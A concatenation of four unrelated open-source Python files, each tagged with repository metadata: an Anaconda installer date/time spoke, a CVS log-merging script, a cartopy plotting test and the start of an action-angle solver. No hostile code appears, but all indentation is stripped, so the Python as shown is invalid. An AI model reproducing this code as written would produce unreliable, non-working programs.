itr = self._serversStore.get_iter(path)
if self._serversStore[itr][0] == new_text:
return
self._serversStore.set_value(itr, 0, new_text)
self._serversStore.set_value(itr, 1, SERVER_QUERY)
self._refresh_server_working(itr)
class DatetimeSpoke(FirstbootSpokeMixIn, NormalSpoke):
builderObjects = ["datetimeWindow",
"days", "months", "years", "regions", "cities",
"upImage", "upImage1", "upImage2", "downImage",
"downImage1", "downImage2", "downImage3", "configImage",
"citiesFilter", "daysFilter",
"cityCompletion", "regionCompletion",
]
mainWidgetName = "datetimeWindow"
uiFile = "spokes/datetime_spoke.glade"
helpFile = "DateTimeSpoke.xml"
category = LocalizationCategory
icon = "preferences-system-time-symbolic"
title = CN_("GUI|Spoke", "_TIME & DATE")
# Hack to get libtimezonemap loaded for GtkBuilder
# see https://bugzilla.gnome.org/show_bug.cgi?id=712184
_hack = TimezoneMap.TimezoneMap()
del(_hack)
def __init__(self, *args):
NormalSpoke.__init__(self, *args)
# taking values from the kickstart file?
self._kickstarted = flags.flags.automatedInstall
self._update_datetime_timer_id = None
self._start_updating_timer_id = None
self._shown = False
self._tz = None
def initialize(self):
NormalSpoke.initialize(self)
self._daysStore = self.builder.get_object("days")
self._monthsStore = self.builder.get_object("months")
self._yearsStore = self.builder.get_object("years")
self._regionsStore = self.builder.get_object("regions")
self._citiesStore = self.builder.get_object("cities")
self._tzmap = self.builder.get_object("tzmap")
self._dateBox = self.builder.get_object("dateBox")
# we need to know it the new value is the same as previous or not
self._old_region = None
self._old_city = None
self._regionCombo = self.builder.get_object("regionCombobox")
self._cityCombo = self.builder.get_object("cityCombobox")
self._daysFilter = self.builder.get_object("daysFilter")
self._daysFilter.set_visible_func(self.existing_date, None)
self._citiesFilter = self.builder.get_object("citiesFilter")
self._citiesFilter.set_visible_func(self.city_in_region, None)
self._hoursLabel = self.builder.get_object("hoursLabel")
self._minutesLabel = self.builder.get_object("minutesLabel")
self._amPmUp = self.builder.get_object("amPmUpButton")
self._amPmDown = self.builder.get_object("amPmDownButton")
self._amPmLabel = self.builder.get_object("amPmLabel")
self._radioButton24h = self.builder.get_object("timeFormatRB")
self._amPmRevealer = self.builder.get_object("amPmRevealer")
# create widgets for displaying/configuring date
day_box, self._dayCombo, day_label = _new_date_field_box(self._daysFilter)
self._dayCombo.connect("changed", self.on_day_changed)
month_box, self._monthCombo, month_label = _new_date_field_box(self._monthsStore)
self._monthCombo.connect("changed", self.on_month_changed)
year_box, self._yearCombo, year_label = _new_date_field_box(self._yearsStore)
self._yearCombo.connect("changed", self.on_year_changed)
# get the right order for date widgets and respective formats and put
# widgets in place
widgets, formats = resolve_date_format(year_box, month_box, day_box)
for widget in widgets:
self._dateBox.pack_start(widget, False, False, 0)
self._day_format, suffix = formats[widgets.index(day_box)]
day_label.set_text(suffix)
self._month_format, suffix = formats[widgets.index(month_box)]
month_label.set_text(suffix)
self._year_format, suffix = formats[widgets.index(year_box)]
year_label.set_text(suffix)
self._ntpSwitch = self.builder.get_object("networkTimeSwitch")
self._regions_zones = get_all_regions_and_timezones()
# Set the initial sensitivity of the AM/PM toggle based on the time-type selected
self._radioButton24h.emit("toggled")
if not flags.can_touch_runtime_system("modify system time and date"):
self._set_date_time_setting_sensitive(False)
self._config_dialog = NTPconfigDialog(self.data)
self._config_dialog.initialize()
threadMgr.add(AnacondaThread(name=constants.THREAD_DATE_TIME,
target=self._initialize))
def _initialize(self):
# a bit hacky way, but should return the translated strings
for i in range(1, 32):
day = datetime.date(2000, 1, i).strftime(self._day_format)
self.add_to_store_idx(self._daysStore, i, day)
for i in range(1, 13):
month = datetime.date(2000, i, 1).strftime(self._month_format)
self.add_to_store_idx(self._monthsStore, i, month)
for i in range(1990, 2051):
year = datetime.date(i, 1, 1).strftime(self._year_format)
self.add_to_store_idx(self._yearsStore, i, year)
cities = set()
xlated_regions = ((region, get_xlated_timezone(region))
for region in self._regions_zones.keys())
for region, xlated in sorted(xlated_regions, cmp=_compare_regions):
self.add_to_store_xlated(self._regionsStore, region, xlated)
for city in self._regions_zones[region]:
cities.add((city, get_xlated_timezone(city)))
for city, xlated in sorted(cities, cmp=_compare_cities):
self.add_to_store_xlated(self._citiesStore, city, xlated)
self._update_datetime_timer_id = None
if is_valid_timezone(self.data.timezone.timezone):
self._set_timezone(self.data.timezone.timezone)
elif not flags.flags.automatedInstall:
log.warning("%s is not a valid timezone, falling back to default (%s)",
self.data.timezone.timezone, DEFAULT_TZ)
self._set_timezone(DEFAULT_TZ)
self.data.timezone.timezone = DEFAULT_TZ
time_init_thread = threadMgr.get(constants.THREAD_TIME_INIT)
if time_init_thread is not None:
hubQ.send_message(self.__class__.__name__,
_("Restoring hardware time..."))
threadMgr.wait(constants.THREAD_TIME_INIT)
hubQ.send_ready(self.__class__.__name__, False)
@property
def status(self):
if self.data.timezone.timezone:
if is_valid_timezone(self.data.timezone.timezone):
return _("%s timezone") % get_xlated_timezone(self.data.timezone.timezone)
else:
return _("Invalid timezone")
else:
location = self._tzmap.get_location()
if location and location.get_property("zone"):
return _("%s timezone") % get_xlated_timezone(location.get_property("zone"))
else:
return _("Nothing selected")
def apply(self):
self._shown = False
# we could use self._tzmap.get_timezone() here, but it returns "" if
# Etc/XXXXXX timezone is selected
region = self._get_active_region()
city = self._get_active_city()
# nothing selected, just leave the spoke and
# return to hub without changing anything
if not region or not city:
return
old_tz = self.data.timezone.timezone
new_tz = region + "/" + city
self.data.timezone.timezone = new_tz
if old_tz != new_tz:
# new values, not from kickstart
self.data.timezone.seen = False
self._kickstarted = False
self.data.timezone.nontp = not self._ntpSwitch.get_active()
def execute(self):
if self._update_datetime_timer_id is not None:
GLib.source_remove(self._update_datetime_timer_id)
self._update_datetime_timer_id = None
self.data.timezone.setup(self.data)
@property
def ready(self):
return not threadMgr.get("AnaDateTimeThread")
@property
def completed(self):
if self._kickstarted and not self.data.timezone.seen:
# taking values from kickstart, but not specified
return False
else:
return is_valid_timezone(self.data.timezone.timezone)
@property
def mandatory(self):
return True
def refresh(self):
self._shown = True
#update the displayed time
self._update_datetime_timer_id = GLib.timeout_add_seconds(1,
self._update_datetime)
self._start_updating_timer_id = None
if is_valid_timezone(self.data.timezone.timezone):
self._tzmap.set_timezone(self.data.timezone.timezone)
self._update_datetime()
has_active_network = nm.nm_is_connected()
if not has_active_network:
self._show_no_network_warning()
else:
self.clear_info()
gtk_call_once(self._config_dialog.refresh_servers_state)
if flags.can_touch_runtime_system("get NTP service state"):
ntp_working = has_active_network and iutil.service_running(NTP_SERVICE)
else:
ntp_working = not self.data.timezone.nontp
self._ntpSwitch.set_active(ntp_working)
@gtk_action_wait
def _set_timezone(self, timezone):
"""
Sets timezone to the city/region comboboxes and the timezone map.
:param timezone: timezone to set
:type timezone: str
:return: if successfully set or not
:rtype: bool
"""
parts = timezone.split("/", 1)
if len(parts) != 2:
# invalid timezone cannot be set
return False
region, city = parts
self._set_combo_selection(self._regionCombo, region)
self._set_combo_selection(self._cityCombo, city)
return True
@gtk_action_nowait
def add_to_store_xlated(self, store, item, xlated):
store.append([item, xlated])
@gtk_action_nowait
def add_to_store(self, store, item):
store.append([item])
@gtk_action_nowait
def add_to_store_idx(self, store, idx, item):
store.append([idx, item])
def existing_date(self, days_model, days_iter, user_data=None):
if not days_iter:
return False
day = days_model[days_iter][0]
#days 1-28 are in every month every year
if day < 29:
return True
months_model = self._monthCombo.get_model()
months_iter = self._monthCombo.get_active_iter()
if not months_iter:
return True
years_model = self._yearCombo.get_model()
years_iter = self._yearCombo.get_active_iter()
if not years_iter:
return True
try:
datetime.date(years_model[years_iter][0],
months_model[months_iter][0], day)
return True
except ValueError:
return False
def _get_active_city(self):
cities_model = self._cityCombo.get_model()
cities_iter = self._cityCombo.get_active_iter()
if not cities_iter:
return None
return cities_model[cities_iter][0]
def _get_active_region(self):
regions_model = self._regionCombo.get_model()
regions_iter = self._regionCombo.get_active_iter()
if not regions_iter:
return None
return regions_model[regions_iter][0]
def city_in_region(self, model, itr, user_data=None):
if not itr:
return False
city = model[itr][0]
region = self._get_active_region()
if not region:
return False
return city in self._regions_zones[region]
def _set_amPm_part_sensitive(self, sensitive):
for widget in (self._amPmUp, self._amPmDown, self._amPmLabel):
widget.set_sensitive(sensitive)
def _to_amPm(self, hours):
if hours >= 12:
day_phase = _("PM")
else:
day_phase = _("AM")
new_hours = ((hours - 1) % 12) + 1
return (new_hours, day_phase)
def _to_24h(self, hours, day_phase):
correction = 0
if day_phase == _("AM") and hours == 12:
correction = -12
elif day_phase == _("PM") and hours != 12:
correction = 12
return (hours + correction) % 24
def _update_datetime(self):
now = datetime.datetime.now(self._tz)
if self._radioButton24h.get_active():
self._hoursLabel.set_text("%0.2d" % now.hour)
else:
hours, amPm = self._to_amPm(now.hour)
self._hoursLabel.set_text("%0.2d" % hours)
self._amPmLabel.set_text(amPm)
self._minutesLabel.set_text("%0.2d" % now.minute)
self._set_combo_selection(self._dayCombo, now.day)
self._set_combo_selection(self._monthCombo, now.month)
self._set_combo_selection(self._yearCombo, now.year)
#GLib's timer is driven by the return value of the function.
#It runs the fuction periodically while the returned value
#is True.
return True
def _save_system_time(self):
"""
Returning False from this method removes the timer that would
otherwise call it again and again.
"""
self._start_updating_timer_id = None
if not flags.can_touch_runtime_system("save system time"):
return False
month = self._get_combo_selection(self._monthCombo)[0]
if not month:
return False
year = self._get_combo_selection(self._yearCombo)[0]
if not year:
return False
hours = int(self._hoursLabel.get_text())
if not self._radioButton24h.get_active():
hours = self._to_24h(hours, self._amPmLabel.get_text())
minutes = int(self._minutesLabel.get_text())
day = self._get_combo_selection(self._dayCombo)[0]
#day may be None if there is no such in the selected year and month
if day:
isys.set_system_date_time(year, month, day, hours, minutes, tz=self._tz)
#start the timer only when the spoke is shown
if self._shown and not self._update_datetime_timer_id:
self._update_datetime_timer_id = GLib.timeout_add_seconds(1,
self._update_datetime)
#run only once (after first 2 seconds of inactivity)
return False
def _stop_and_maybe_start_time_updating(self, interval=2):
"""
This method is called in every date/time-setting button's callback.
It removes the timer for updating displayed date/time (do not want to
change it while user does it manually) and allows us to set new system
date/time only after $interval seconds long idle on time-setting buttons.
This is done by the _start_updating_timer that is reset in this method.
So when there is $interval seconds long idle on date/time-setting
buttons, self._save_system_time method is invoked. Since it returns
False, this timer is then removed and only reactivated in this method
(thus in some date/time-setting button's callback).
"""
#do not start timers if the spoke is not shown
if not self._shown:
self._update_datetime()
self._save_system_time()
return
#stop time updating
if self._update_datetime_timer_id:
GLib.source_remove(self._update_datetime_timer_id)
self._update_datetime_timer_id = None
#stop previous $interval seconds timer (see below)
if self._start_updating_timer_id:
GLib.source_remove(self._start_updating_timer_id)
#let the user change date/time and after $interval seconds of inactivity
#save it as the system time and start updating the displayed date/time
self._start_updating_timer_id = GLib.timeout_add_seconds(interval,
self._save_system_time)
def _set_combo_selection(self, combo, item):
model = combo.get_model()
if not model:
return False
itr = model.get_iter_first()
while itr:
if model[itr][0] == item:
combo.set_active_iter(itr)
return True
itr = model.iter_next(itr)
return False
def _get_combo_selection(self, combo):
"""
Get the selected item of the combobox.
:return: selected item or None
"""
model = combo.get_model()
itr = combo.get_active_iter()
if not itr or not model:
return None, None
return model[itr][0], model[itr][1]
def _restore_old_city_region(self):
"""Restore stored "old" (or last valid) values."""
# check if there are old values to go back to
if self._old_region and self._old_city:
self._set_timezone(self._old_region + "/" + self._old_city)
def on_up_hours_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
hours = int(self._hoursLabel.get_text())
if self._radioButton24h.get_active():
new_hours = (hours + 1) % 24
else:
amPm = self._amPmLabel.get_text()
#let's not deal with magical AM/PM arithmetics
new_hours = self._to_24h(hours, amPm)
new_hours, new_amPm = self._to_amPm((new_hours + 1) % 24)
self._amPmLabel.set_text(new_amPm)
new_hours_str = "%0.2d" % new_hours
self._hoursLabel.set_text(new_hours_str)
def on_down_hours_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
hours = int(self._hoursLabel.get_text())
if self._radioButton24h.get_active():
new_hours = (hours - 1) % 24
else:
amPm = self._amPmLabel.get_text()
#let's not deal with magical AM/PM arithmetics
new_hours = self._to_24h(hours, amPm)
new_hours, new_amPm = self._to_amPm((new_hours - 1) % 24)
self._amPmLabel.set_text(new_amPm)
new_hours_str = "%0.2d" % new_hours
self._hoursLabel.set_text(new_hours_str)
def on_up_minutes_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
minutes = int(self._minutesLabel.get_text())
minutes_str = "%0.2d" % ((minutes + 1) % 60)
self._minutesLabel.set_text(minutes_str)
def on_down_minutes_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
minutes = int(self._minutesLabel.get_text())
minutes_str = "%0.2d" % ((minutes - 1) % 60)
self._minutesLabel.set_text(minutes_str)
def on_updown_ampm_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
if self._amPmLabel.get_text() == _("AM"):
self._amPmLabel.set_text(_("PM"))
else:
self._amPmLabel.set_text(_("AM"))
def on_region_changed(self, combo, *args):
"""
:see: on_city_changed
"""
region = self._get_active_region()
if not region or region == self._old_region:
# region entry being edited or old_value chosen, no action needed
# @see: on_city_changed
return
self._citiesFilter.refilter()
# Set the city to the first one available in this newly selected region.
zone = self._regions_zones[region]
firstCity = sorted(list(zone))[0]
self._set_combo_selection(self._cityCombo, firstCity)
self._old_region = region
self._old_city = firstCity
def on_city_changed(self, combo, *args):
"""
ComboBox emits ::changed signal not only when something is selected, but
also when its entry's text is changed. We need to distinguish between
those two cases ('London' typed in the entry => no action until ENTER is
hit etc.; 'London' chosen in the expanded combobox => update timezone
map and do all necessary actions). Fortunately when entry is being
edited, self._get_active_city returns None.
"""
timezone = None
region = self._get_active_region()
city = self._get_active_city()
if not region or not city or (region == self._old_region and
city == self._old_city):
# entry being edited or no change, no actions needed
return
if city and region:
timezone = region + "/" + city
else:
# both city and region are needed to form a valid timezone
return
if region == "Etc":
# Etc timezones cannot be displayed on the map, so let's reset the
# location and manually set a highlight with no location pin.
self._tzmap.clear_location()
if city in ("GMT", "UTC"):
offset = 0.0
# The tzdb data uses POSIX-style signs for the GMT zones, which is
# the opposite of whatever everyone else expects. GMT+4 indicates a
# zone four hours west of Greenwich; i.e., four hours before. Reverse
# the sign to match the libtimezone map.
else:
# Take the part after "GMT"
offset = -float(city[3:])
self._tzmap.set_selected_offset(offset)
else:
# we don't want the timezone-changed signal to be emitted
self._tzmap.set_timezone(timezone)
# update "old" values
self._old_city = city
def on_entry_left(self, entry, *args):
# user clicked somewhere else or hit TAB => finished editing
entry.emit("activate")
def on_city_region_key_released(self, entry, event, *args):
if event.type == Gdk.EventType.KEY_RELEASE and \
event.keyval == Gdk.KEY_Escape:
# editing canceled
self._restore_old_city_region()
def on_completion_match_selected(self, combo, model, itr):
item = None
if model and itr:
item = model[itr][0]
if item:
self._set_combo_selection(combo, item)
def on_city_region_text_entry_activated(self, entry):
combo = entry.get_parent()
model = combo.get_model()
entry_text = entry.get_text().lower()
for row in model:
if entry_text == row[0].lower():
self._set_combo_selection(combo, row[0])
return
# non-matching value entered, reset to old values
self._restore_old_city_region()
def on_month_changed(self, *args):
self._stop_and_maybe_start_time_updating(interval=5)
self._daysFilter.refilter()
def on_day_changed(self, *args):
self._stop_and_maybe_start_time_updating(interval=5)
def on_year_changed(self, *args):
self._stop_and_maybe_start_time_updating(interval=5)
self._daysFilter.refilter()
def on_location_changed(self, tz_map, location):
if not location:
return
timezone = location.get_property('zone')
if self._set_timezone(timezone):
# timezone successfully set
self._tz = get_timezone(timezone)
self._update_datetime()
def on_timeformat_changed(self, button24h, *args):
hours = int(self._hoursLabel.get_text())
amPm = self._amPmLabel.get_text()
#connected to 24-hour radio button
if button24h.get_active():
self._set_amPm_part_sensitive(False)
new_hours = self._to_24h(hours, amPm)
self._amPmRevealer.set_reveal_child(False)
else:
self._set_amPm_part_sensitive(True)
new_hours, new_amPm = self._to_amPm(hours)
self._amPmLabel.set_text(new_amPm)
self._amPmRevealer.set_reveal_child(True)
self._hoursLabel.set_text("%0.2d" % new_hours)
def _set_date_time_setting_sensitive(self, sensitive):
#contains all date/time setting widgets
footer_alignment = self.builder.get_object("footerAlignment")
footer_alignment.set_sensitive(sensitive)
def _show_no_network_warning(self):
self.set_warning(_("You need to set up networking first if you "\
"want to use NTP"))
def _show_no_ntp_server_warning(self):
self.set_warning(_("You have no working NTP server configured"))
def on_ntp_switched(self, switch, *args):
if switch.get_active():
#turned ON
if not flags.can_touch_runtime_system("start NTP service"):
#cannot touch runtime system, not much to do here
return
if not nm.nm_is_connected():
self._show_no_network_warning()
switch.set_active(False)
return
else:
self.clear_info()
working_server = self._config_dialog.working_server
if working_server is None:
self._show_no_ntp_server_warning()
else:
#we need a one-time sync here, because chronyd would not change
#the time as drastically as we need
ntp.one_time_sync_async(working_server)
ret = iutil.start_service(NTP_SERVICE)
self._set_date_time_setting_sensitive(False)
#if starting chronyd failed and chronyd is not running,
#set switch back to OFF
if (ret != 0) and not iutil.service_running(NTP_SERVICE):
switch.set_active(False)
else:
#turned OFF
if not flags.can_touch_runtime_system("stop NTP service"):
#cannot touch runtime system, nothing to do here
return
self._set_date_time_setting_sensitive(True)
ret = iutil.stop_service(NTP_SERVICE)
#if stopping chronyd failed and chronyd is running,
#set switch back to ON
if (ret != 0) and iutil.service_running(NTP_SERVICE):
switch.set_active(True)
self.clear_info()
def on_ntp_config_clicked(self, *args):
self._config_dialog.refresh()
with self.main_window.enlightbox(self._config_dialog.window):
response = self._config_dialog.run()
if response == 1:
self.data.timezone.ntpservers = self._config_dialog.servers
if self._config_dialog.working_server is None:
self._show_no_ntp_server_warning()
else:
self.clear_info()
| cgwalters/anaconda | pyanaconda/ui/gui/spokes/datetime_spoke.py | Python | gpl-2.0 | 39,276 |
#! /usr/bin/env python
"""Consolidate a bunch of CVS or RCS logs read from stdin.
Input should be the output of a CVS or RCS logging command, e.g.
cvs log -rrelease14:
which dumps all log messages from release1.4 upwards (assuming that
release 1.4 was tagged with tag 'release14'). Note the trailing
colon!
This collects all the revision records and outputs them sorted by date
rather than by file, collapsing duplicate revision record, i.e.,
records with the same message for different files.
The -t option causes it to truncate (discard) the last revision log
entry; this is useful when using something like the above cvs log
command, which shows the revisions including the given tag, while you
probably want everything *since* that tag.
The -r option reverses the output (oldest first; the default is oldest
last).
The -b tag option restricts the output to *only* checkin messages
belonging to the given branch tag. The form -b HEAD restricts the
output to checkin messages belonging to the CVS head (trunk). (It
produces some output if tag is a non-branch tag, but this output is
not very useful.)
-h prints this message and exits.
XXX This code was created by reverse engineering CVS 1.9 and RCS 5.7
from their output.
"""
import sys, errno, getopt, re
sep1 = '='*77 + '\n' # file separator
sep2 = '-'*28 + '\n' # revision separator
def main():
"""Main program"""
truncate_last = 0
reverse = 0
branch = None
opts, args = getopt.getopt(sys.argv[1:], "trb:h")
for o, a in opts:
if o == '-t':
truncate_last = 1
elif o == '-r':
reverse = 1
elif o == '-b':
branch = a
elif o == '-h':
print __doc__
sys.exit(0)
database = []
while 1:
chunk = read_chunk(sys.stdin)
if not chunk:
break
records = digest_chunk(chunk, branch)
if truncate_last:
del records[-1]
database[len(database):] = records
database.sort()
if not reverse:
database.reverse()
format_output(database)
def read_chunk(fp):
"""Read a chunk -- data for one file, ending with sep1.
Split the chunk in parts separated by sep2.
"""
chunk = []
lines = []
while 1:
line = fp.readline()
if not line:
break
if line == sep1:
if lines:
chunk.append(lines)
break
if line == sep2:
if lines:
chunk.append(lines)
lines = []
else:
lines.append(line)
return chunk
def digest_chunk(chunk, branch=None):
"""Digest a chunk -- extract working file name and revisions"""
lines = chunk[0]
key = 'Working file:'
keylen = len(key)
for line in lines:
if line[:keylen] == key:
working_file = line[keylen:].strip()
break
else:
working_file = None
if branch is None:
pass
elif branch == "HEAD":
branch = re.compile(r"^\d+\.\d+$")
else:
revisions = {}
key = 'symbolic names:\n'
found = 0
for line in lines:
if line == key:
found = 1
elif found:
if line[0] in '\t ':
tag, rev = line.split()
if tag[-1] == ':':
tag = tag[:-1]
revisions[tag] = rev
else:
found = 0
rev = revisions.get(branch)
branch = re.compile(r"^<>$") # <> to force a mismatch by default
if rev:
if rev.find('.0.') >= 0:
rev = rev.replace('.0.', '.')
branch = re.compile(r"^" + re.escape(rev) + r"\.\d+$")
records = []
for lines in chunk[1:]:
revline = lines[0]
dateline = lines[1]
text = lines[2:]
words = dateline.split()
author = None
if len(words) >= 3 and words[0] == 'date:':
dateword = words[1]
timeword = words[2]
if timeword[-1:] == ';':
timeword = timeword[:-1]
date = dateword + ' ' + timeword
if len(words) >= 5 and words[3] == 'author:':
author = words[4]
if author[-1:] == ';':
author = author[:-1]
else:
date = None
text.insert(0, revline)
words = revline.split()
if len(words) >= 2 and words[0] == 'revision':
rev = words[1]
else:
# No 'revision' line -- weird...
rev = None
text.insert(0, revline)
if branch:
if rev is None or not branch.match(rev):
continue
records.append((date, working_file, rev, author, text))
return records
def format_output(database):
prevtext = None
prev = []
database.append((None, None, None, None, None)) # Sentinel
for (date, working_file, rev, author, text) in database:
if text != prevtext:
if prev:
print sep2,
for (p_date, p_working_file, p_rev, p_author) in prev:
print p_date, p_author, p_working_file, p_rev
sys.stdout.writelines(prevtext)
prev = []
prev.append((date, working_file, rev, author))
prevtext = text
if __name__ == '__main__':
try:
main()
except IOError, e:
if e.errno != errno.EPIPE:
raise
| teeple/pns_server | work/install/Python-2.7.4/Tools/scripts/logmerge.py | Python | gpl-2.0 | 5,576 |
# (C) British Crown Copyright 2011 - 2012, Met Office
#
# This file is part of cartopy.
#
# cartopy is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cartopy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with cartopy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
from matplotlib.testing.decorators import image_comparison as mpl_image_comparison
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from matplotlib.collections import PatchCollection
from matplotlib.path import Path
import shapely.geometry
import cartopy.crs as ccrs
import cartopy.mpl_integration.patch as cpatch
from cartopy.tests.mpl import image_comparison
@image_comparison(baseline_images=['poly_interiors'])
def test_polygon_interiors():
ax = plt.subplot(211, projection=ccrs.PlateCarree())
ax.coastlines()
ax.set_global() # XXX could be the default???
pth = Path([[0, 45], [60, 45], [60, -45], [0, -45], [0, -45],
[10, 20], [10, -20], [40, -20], [40, 20], [10, -20]],
[1, 2, 2, 2, 79, 1, 2, 2 , 2, 79])
patches_native = []
patches = []
for geos in cpatch.path_to_geos(pth):
for pth in cpatch.geos_to_path(geos):
patches.append(mpatches.PathPatch(pth))
# buffer by 10 degrees (leaves a small hole in the middle)
geos_buffered = geos.buffer(10)
for pth in cpatch.geos_to_path(geos_buffered):
patches_native.append(mpatches.PathPatch(pth))
collection = PatchCollection(patches_native, facecolor='red', alpha=0.4,
transform=ax.projection
)
ax.add_collection(collection)
collection = PatchCollection(patches, facecolor='yellow', alpha=0.4,
transform=ccrs.Geodetic()
)
ax.add_collection(collection)
# test multiple interior polygons
ax = plt.subplot(212, projection=ccrs.PlateCarree(), xlim=[-5, 15], ylim=[-5, 15])
ax.coastlines()
exterior = np.array(shapely.geometry.box(0, 0, 12, 12).exterior.coords)
interiors = [
np.array(shapely.geometry.box(1, 1, 2, 2, ccw=False).exterior.coords),
np.array(shapely.geometry.box(1, 8, 2, 9, ccw=False).exterior.coords),
]
poly = shapely.geometry.Polygon(exterior, interiors)
patches = []
for pth in cpatch.geos_to_path(poly):
patches.append(mpatches.PathPatch(pth))
collection = PatchCollection(patches, facecolor='yellow', alpha=0.4,
transform=ccrs.Geodetic()
)
ax.add_collection(collection)
@image_comparison(baseline_images=['contour_with_interiors'])
def test_contour_interiors():
# ############## produces a polygon with multiple holes:
nx, ny = 10, 10
numlev = 2
lons, lats = np.meshgrid(np.linspace(-50, 50, nx), np.linspace(-45, 45, ny))
data = np.sin(np.sqrt(lons**2 + lats**2))
ax = plt.subplot(221, projection=ccrs.PlateCarree())
ax.set_global()
plt.title("Native projection")
plt.contourf(lons, lats, data, numlev, transform=ccrs.PlateCarree())
ax.coastlines()
plt.subplot(222, projection=ccrs.PlateCarree())
plt.title("Non-native projection")
ax = plt.gca()
ax.set_global()
plt.contourf(lons, lats, data, numlev, transform=ccrs.Geodetic())
ax.coastlines()
############## produces singular polygons (zero area polygons)
numlev = 2
x, y = np.meshgrid(np.arange(-5.5, 5.5, 0.25), np.arange(-5.5, 5.5, 0.25))
dim = x.shape[0]
data = Z = np.sin(np.sqrt(x**2 + y**2))
lats = np.arange(dim) + 30
lons = np.arange(dim) - 20
ax = plt.subplot(223, projection=ccrs.PlateCarree())
ax.set_global()
plt.title("Native projection")
plt.contourf(lons, lats, data, numlev, transform=ccrs.PlateCarree())
ax.coastlines()
plt.subplot(224, projection=ccrs.PlateCarree())
plt.title("Non-native projection")
ax = plt.gca()
ax.set_global()
cs = plt.contourf(lons, lats, data, numlev, transform=ccrs.Geodetic())
ax.coastlines()
if __name__=='__main__':
import nose
nose.runmodule(argv=['-s','--with-doctest'], exit=False) | marqh/cartopy | lib/cartopy/tests/mpl/test_shapely_to_mpl.py | Python | gpl-3.0 | 4,821 |
#################
# AA Solvers #
#################
import numpy as np
from itertools import product
from scipy.linalg import solve
from scipy.sparse.linalg import spsolve
def check_each_direction(n,angs,ifprint=True):
""" returns a list of the index of elements of n which do not have adequate
toy angle coverage. The criterion is that we must have at least one sample
in each Nyquist box when we project the toy angles along the vector n """
checks = np.array([])
P = np.array([])
if(ifprint):
print("\nChecking modes:\n====")
for k,i in enumerate(n):
N_matrix = np.linalg.norm(i)
X = np.dot(angs,i)
if(np.abs(np.max(X)-np.min(X))<2.*np.pi):
if(ifprint):
print("Need a longer integration window for mode ", i)
checks=np.append(checks,i)
P = np.append(P,(2.*np.pi-np.abs(np.max(X)-np.min(X))))
elif(np.abs(np.max(X)-np.min(X))/len(X)>np.pi):
if(ifprint):
print("Need a finer sampling for mode ", i)
checks=np.append(checks,i)
P = np.append(P,(2.*np.pi-np.abs(np.max(X)-np.min(X))))
if(ifprint):
print("====\n")
return checks,P
def solver(AA, N_max, symNx = 2, throw_out_modes=False):
""" Constructs the matrix A and the vector b from a timeseries of toy
action-angles AA to solve for the vector x = (J_0,J_1,J_2,S...) where
x contains all Fourier components of the generating function with |n|<N_max """
# Find all integer component n_vectors which lie within sphere of radius N_max
# Here we have assumed that the potential is symmetric x->-x, y->-y, z->-z
# This can be relaxed by changing symN to 1
# Additionally due to time reversal symmetry S_n = -S_-n so we only consider
# "half" of the n-vector-space
angs = unroll_angles(AA.T[3:].T,np.ones(3))
symNz = 2
NNx = range(-N_max, N_max+1, symNx)
NNy = range(-N_max, N_max+1, symNz)
NNz = range(-N_max, N_max+1, symNz)
n_vectors = np.array([[i,j,k] for (i,j,k) in product(NNx,NNy,NNz)
if(not(i==0 and j==0 and k==0) # exclude zero vector
and (k>0 # northern hemisphere
or (k==0 and j>0) # half of x-y plane
or (k==0 and j==0 and i>0)) # half of x axis
and np.sqrt(i*i+j*j+k*k)<=N_max)]) # inside sphere
xxx = check_each_direction(n_vectors,angs)
if(throw_out_modes):
n_vectors = np.delete(n_vectors,check_each_direction(n_vectors,angs),axis=0)
n = len(n_vectors)+3
b = np.zeros(shape=(n, ))
a = np.zeros(shape=(n,n))
a[:3,:3]=len(AA)*np.identity(3)
for i in AA:
a[:3,3:]+=2.*n_vectors.T[:3]*np.cos(np.dot(n_vectors,i[3:]))
a[3:,3:]+=4.*np.dot(n_vectors,n_vectors.T)*np.outer(np.cos(np.dot(n_vectors,i[3:])),np.cos(np.dot(n_vectors,i[3:])))
b[:3]+=i[:3]
b[3:]+=2.*np.dot(n_vectors,i[:3])*np.cos(np.dot(n_vectors,i[3:]))
a[3:,:3]=a[:3,3:].T
return np.array(solve(a,b)), n_vectors
def unroll_angles(A,sign):
""" Unrolls the angles, A, so they increase continuously """
n = np.array([0,0,0])
P = np.zeros(np.shape(A))
P[0]=A[0]
for i in range(1,len(A)):
n = n+((A[i]-A[i-1]+0.5*sign*np.pi)*sign<0)*np.ones(3)*2.*np.pi
P[i] = A[i]+sign*n
return P
import matplotlib.pyplot as plt
from scipy.stats import linregress as lr
def angle_solver(AA, timeseries, N_max, sign, symNx = 2, throw_out_modes=False):
""" Constructs the matrix A and the vector b from a timeseries of toy
action-angles AA to solve for the vector x = (theta_0,theta_1,theta_2,omega_1,
omega_2,omega_3, dSdx..., dSdy..., dSdz...) where x contains all derivatives
of the Fourier components of the generating function with |n| < N_max """
# First unroll angles
angs = unroll_angles(AA.T[3:].T,sign)
# Same considerations as above
symNz = 2
NNx = range(-N_max, N_max+1, symNx)
NNy = range(-N_max, N_max+1, symNz)
NNz = range(-N_max, N_max+1, symNz)
n_vectors = np.array([[i,j,k] for (i,j,k) in product(NNx,NNy,NNz)
if(not(i==0 and j==0 and k==0) # exclude zero vector
and (k>0 # northern hemisphere
or (k==0 and j>0) # half of x-y plane
or (k==0 and j==0 and i>0)) # half of x axis
and np.sqrt(i*i+j*j+k*k)<=N_max # inside sphere
)])
if(throw_out_modes):
n_vectors = np.delete(n_vectors,check_each_direction(n_vectors,angs),axis=0)
nv = len(n_vectors)
n = 3*nv+6
b = np.zeros(shape=(n, ))
a = np.zeros(shape=(n,n))
a[:3,:3]=len(AA)*np.identity(3)
a[:3,3:6]=np.sum(timeseries)*np.identity(3)
a[3:6,:3]=a[:3,3:6]
